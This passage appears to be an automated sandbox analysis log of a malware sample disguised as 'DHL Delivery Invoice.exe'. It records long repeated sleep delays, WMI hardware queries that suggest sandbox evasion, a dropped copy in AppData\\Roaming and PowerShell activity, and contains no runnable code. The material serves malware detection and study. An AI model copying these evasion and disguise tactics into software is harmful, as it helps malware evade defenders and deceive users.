                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -99890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -99781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -99672s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -99561s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -99453s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -99343s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -99234s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -99125s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -99015s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -98906s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -98796s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -98685s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -98578s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -98468s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -98359s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -98250s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -98140s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -98019s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -97905s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -97797s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -97687s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -97578s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -97468s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -97357s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -97249s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -97140s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -97031s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -96921s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -96812s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -96703s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -96593s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -96484s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -96375s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -96265s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -96156s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -96047s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -95936s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -95828s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -95718s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -95597s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -95484s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -95375s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -95265s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -95156s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -95047s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -94936s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -94828s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -94718s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -94609s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7308Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -28592453314249787s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -99875s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -99766s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -99625s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -99516s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -99391s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -99266s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -99157s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -99032s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -98907s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -98797s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -98688s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -98563s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -98438s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -98313s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -98188s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -98079s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -97954s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -97829s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -97704s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -97579s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -97454s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -97329s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -97204s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -97079s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -96954s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -96829s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -96704s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -96579s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -96454s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -96329s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -96204s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -96079s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -95954s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -95829s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -95704s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -95579s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -95454s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -95329s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -95204s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -95079s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -94954s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -94829s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -94704s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -94579s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -94454s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -94329s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -94204s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -94079s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556Thread sleep time: -93954s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 99890Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 99781Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 99672Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 99561Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 99453Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 99343Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 99234Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 99125Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 99015Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 98906Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 98796Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 98685Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 98578Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 98468Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 98359Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 98250Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 98140Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 98019Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 97905Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 97797Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 97687Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 97578Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 97468Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 97357Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 97249Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 97140Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 97031Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 96921Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 96812Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 96703Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 96593Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 96484Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 96375Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 96265Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 96156Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 96047Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 95936Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 95828Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 95718Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 95597Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 95484Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 95375Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 95265Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 95156Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 95047Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 94936Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 94828Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 94718Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 94609Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 99875
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 99766
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 99625
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 99516
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 99391
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 99266
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 99157
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 99032
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 98907
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 98797
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 98688
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 98563
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 98438
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 98313
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 98188
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 98079
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 97954
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 97829
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 97704
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 97579
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 97454
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 97329
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 97204
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 97079
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 96954
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 96829
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 96704
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 96579
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 96454
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 96329
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 96204
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 96079
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 95954
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 95829
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 95704
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 95579
